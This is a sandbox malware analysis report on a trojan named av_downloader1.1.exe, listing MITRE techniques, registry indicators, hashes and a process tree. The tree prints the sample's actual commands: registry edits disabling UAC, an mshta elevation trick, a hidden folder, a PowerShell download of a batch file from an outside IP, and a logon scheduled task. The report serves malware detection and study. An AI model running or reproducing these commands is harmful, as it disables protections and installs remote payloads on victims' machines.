2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

Analysis

max time kernel
146s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-10-2024 16:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

av_downloader1.1.exe
Size

88KB
MD5

759f5a6e3daa4972d43bd4a5edbdeb11
SHA1

36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256

2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512

f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
SSDEEP

1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Score

10^/10

defense_evasion discovery evasion execution privilege_escalation trojan

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2708	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1004	attrib.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	AV_DOW~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	av_downloader1.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	mshta.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
1328	mshta.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	av_downloader1.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AV_DOW~1.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4440	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2708	powershell.exe
2708	powershell.exe
3568	msedge.exe
3568	msedge.exe
4708	msedge.exe
4708	msedge.exe
2336	identity_helper.exe
2336	identity_helper.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe
1856	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2708	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe
4708	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2044 wrote to memory of 1144	2044	av_downloader1.1.exe	86
PID 2044 wrote to memory of 1144	2044	av_downloader1.1.exe	86
PID 1144 wrote to memory of 1328	1144	cmd.exe	89
PID 1144 wrote to memory of 1328	1144	cmd.exe	89
PID 1328 wrote to memory of 540	1328	mshta.exe	90
PID 1328 wrote to memory of 540	1328	mshta.exe	90
PID 1328 wrote to memory of 540	1328	mshta.exe	90
PID 540 wrote to memory of 3656	540	AV_DOW~1.EXE	91
PID 540 wrote to memory of 3656	540	AV_DOW~1.EXE	91
PID 3656 wrote to memory of 2960	3656	cmd.exe	93
PID 3656 wrote to memory of 2960	3656	cmd.exe	93
PID 3656 wrote to memory of 4620	3656	cmd.exe	94
PID 3656 wrote to memory of 4620	3656	cmd.exe	94
PID 3656 wrote to memory of 1680	3656	cmd.exe	95
PID 3656 wrote to memory of 1680	3656	cmd.exe	95
PID 3656 wrote to memory of 852	3656	cmd.exe	96
PID 3656 wrote to memory of 852	3656	cmd.exe	96
PID 852 wrote to memory of 972	852	cmd.exe	97
PID 852 wrote to memory of 972	852	cmd.exe	97
PID 3656 wrote to memory of 4708	3656	cmd.exe	100
PID 3656 wrote to memory of 4708	3656	cmd.exe	100
PID 3656 wrote to memory of 1004	3656	cmd.exe	101
PID 3656 wrote to memory of 1004	3656	cmd.exe	101
PID 4708 wrote to memory of 4856	4708	msedge.exe	102
PID 4708 wrote to memory of 4856	4708	msedge.exe	102
PID 3656 wrote to memory of 2708	3656	cmd.exe	103
PID 3656 wrote to memory of 2708	3656	cmd.exe	103
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104
PID 4708 wrote to memory of 1964	4708	msedge.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1004	attrib.exe

C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe
"C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2044
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A95F.tmp\A960.tmp\A961.bat C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1144
- - C:\Windows\system32\mshta.exe
    mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
    3⤵
    - Checks computer location settings
    - Access Token Manipulation: Create Process with Token
    - Suspicious use of WriteProcessMemory
    PID:1328
  - - C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:540
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ABFF.tmp\AC00.tmp\AC01.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3656
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:2960
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:4620
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:1680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:852
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        7⤵
        
        PID:972
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc540946f8,0x7ffc54094708,0x7ffc54094718
        7⤵
        
        PID:4856
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1952 /prefetch:2
        7⤵
        
        PID:1964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3568
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
        7⤵
        
        PID:4420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
        7⤵
        
        PID:3800
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
        7⤵
        
        PID:3652
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
        7⤵
        
        PID:4740
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
        7⤵
        
        PID:2044
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2336
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
        7⤵
        
        PID:3028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
        7⤵
        
        PID:3120
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
        7⤵
        
        PID:1552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
        7⤵
        
        PID:1092
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,2939917178465007335,15957435873399319978,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5520 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1856
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1004
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2708
      - C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4440

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e443ee4336fcf13c698b8ab5f3c173d0

SHA1
9bf70b16f03820cbe3158e1f1396b07b8ac9d75a

SHA256
79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b

SHA512
cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
56a4f78e21616a6e19da57228569489b

SHA1
21bfabbfc294d5f2aa1da825c5590d760483bc76

SHA256
d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb

SHA512
c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\09067ac8-b1bc-4677-a31d-d1663df13f23.tmp

Filesize
5KB

MD5
812503047f8d6890cc981057507c3152

SHA1
388658f9533b37a0a587c2df3ef09a733dbdcfe7

SHA256
59a8603ca56182f4d5a662bf7852263a86c280f9cf34bc80c64743e5181250e9

SHA512
c5da205c8dae2c85f0388a954c54d11f1335e14f919cb5351e4eeb60c9315ce00e762372af7a3911d0337f8b493d085080969e6b4c39c1d11316f3b6b98cd8a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
792B

MD5
fa3599c22f78b4af1516137721adb8f4

SHA1
69746e461f8bb7b27f926fea8c33b215780a41ec

SHA256
f2508dc7dc214ece739c1679fe904212c326747fd458306c582b16b0d2006601

SHA512
b5d3eee2863b12a30e5622fb4b01a05952c558036edd60991d89d40f3e0ba043e324fbe50b8c8bbd4363c1443cc338a2239b7554cd5ba30a27785b00b2e6fd91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
cbf904d16ee53bc6c3ca96ef79000c07

SHA1
e6a91c7813a3f61e00141a8e1e507be45b54a0dc

SHA256
a7de91a433fd3966ca10b1e2d29c91a9ee8b583966dbb80f3a7cea89962e880f

SHA512
906be6788a6f8ca182d7c3ab5e91f43f18dc29d9f89ca8bfefc3f23d324d59b6632f5e0f15d41e36da03130c559b906e193c45fcda8eb742859f2203984fddfe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0c4f1f1d4a9b2f758f45e3c969f16083

SHA1
62bd43f1cb111510902548045d8ca9be16617638

SHA256
1ee3db8b1d100d32a4c31a31fb408186460fdb492f0934c1af1467f99baab0a0

SHA512
177c95a7dee9a89013e97c26b119bff5b4fbe854ba9b77d41a5f90a91ce13b5b0871453687e25c2bc35b5f68a2e141ccc6a7ede3062480f2b0cce55cee180d46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
361f22bbd138fe7421f310358236a503

SHA1
a1d2d79be6482354d921640e05a5e9a5692c01b9

SHA256
24d9e90bcce1d6a36ba2e999fcc2c5501dc1a7cc4b9c3004b8ec5f71ca06486b

SHA512
c1c1a4c7751adc69ab814c331103679abc9d9f3f023f69075af5fb0ece7521cd4a024c61c9a6f0ba3bb8e7753e8cdc78514ffe78805f5f6ef7ee9f1b6e33d420

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe580848.TMP

Filesize
48B

MD5
a65cd54784ca4f4442c7d4f9c5e4f0f2

SHA1
103b9082078f3d68062ddd96f0f1331481d2f84e

SHA256
dfce51a30ff192bc792b657bdf78c64d5332891d9225c64cffd5b6adc4fcb116

SHA512
f0a01e46fbff84ba946d0f943185521b53069b580afc73f6b3e7753df6c8d68ca9f86448ae943878255036b96244dc80caf87ba08d97d09f36156b0c732a7824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
c61eca216dfcf8f6cf4b3557d51cfcfb

SHA1
3aa72a8572f9399a8580e4596ac75da9c390fbed

SHA256
bfe1cf428ed65c0b9bed6642585bb902a80c902bc1a0020ec9bf06e2156c9d84

SHA512
7d1a618cb4363109bc572c3736930d08ffd38a4aea6cf90717e2906ee0de1ad1baad680148e0b9b5ea6d4dfd388252f67528f2e55c607541dc02a63e46e2781e

Download Submit
C:\Users\Admin\AppData\Local\Temp\A95F.tmp\A960.tmp\A961.bat

Filesize
1KB

MD5
9856d2fe29a28c54c5943c2150f7bae1

SHA1
f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

SHA256
0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

SHA512
002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sl31xllc.h44.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2708-17-0x0000028C1ECA0000-0x0000028C1ECC2000-memory.dmp

Filesize
136KB

Download